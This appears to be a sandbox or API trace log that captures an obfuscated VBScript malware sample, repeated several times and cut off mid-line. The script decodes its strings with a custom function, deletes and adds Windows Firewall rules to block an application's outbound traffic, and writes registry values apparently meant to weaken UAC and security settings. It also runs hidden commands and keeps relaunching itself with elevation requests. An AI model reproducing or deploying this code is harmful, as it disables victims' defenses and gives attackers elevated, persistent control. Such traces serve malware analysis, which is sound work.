bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.313] wcsncmp (_String1="1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.313] wcsncmp (_String1=",3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.313] wcsncmp (_String1="3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 38 [0226.313] wcsncmp (_String1=",Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 